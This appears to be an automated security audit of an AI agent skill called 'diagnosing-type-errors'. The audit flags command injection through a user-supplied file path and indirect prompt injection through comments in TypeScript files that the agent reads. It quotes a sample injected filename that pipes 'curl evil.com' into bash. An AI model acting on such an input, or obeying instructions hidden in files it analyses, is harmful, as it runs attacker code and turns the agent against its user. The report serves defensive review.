diagnosing-type-errors

Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGH (COMMAND_EXECUTION, PROMPT_INJECTION)
Full Analysis
  • [COMMAND_EXECUTION] (HIGH): The skill's task includes running the bash command pnpm type-check 2>&1 | grep "target-file", where the file path is provided by the user. If the agent does not sanitize this input, command injection is possible (e.g., using a filename like 'file.ts; curl evil.com | bash').
  • [PROMPT_INJECTION] (HIGH): The skill is highly vulnerable to Indirect Prompt Injection (Category 8).
      1. Ingestion points: It is explicitly designed to read and analyze the content of user-specified TypeScript files.
      2. Boundary markers: There are no instructions to wrap file content in delimiters or to ignore instructions embedded in the code.
      3. Capability inventory: The skill has the capability to execute shell commands and generate code refactors.
      4. Sanitization: No sanitization of the input file content is performed. A malicious file could include comments that redirect the agent's behavior during analysis.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level: HIGH
Analyzed: Feb 16, 2026, 06:26 AM